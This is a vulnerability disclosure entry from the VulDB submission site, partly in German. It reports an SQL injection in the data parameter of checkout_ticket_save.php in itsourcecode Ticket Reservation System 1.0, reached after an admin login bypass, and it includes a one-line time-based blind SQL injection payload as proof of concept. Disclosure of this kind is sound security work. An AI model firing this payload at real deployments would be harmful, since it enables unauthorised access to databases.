Submit #383644: itsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.phpinfo

Titelitsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.php
BeschreibungBy exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "checkout_ticket_save.php" page due to the lack of strict filtering of the data parameter. --------------POC-------------- Parameter: data (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: data=123' AND (SELECT 7295 FROM (SELECT(SLEEP(5)))zbyg) AND 'JWwh'='JWwh
Quelle⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-2.md
Benutzer
 Dee.Mirage (UID 71702)
Einreichung31.07.2024 07:22 (vor 2 Jahren)
Moderieren02.08.2024 23:43 (3 days later)
StatusAkzeptiert
VulDB Eintrag273530 [itsourcecode Ticket Reservation System 1.0 checkout_ticket_save.php data SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!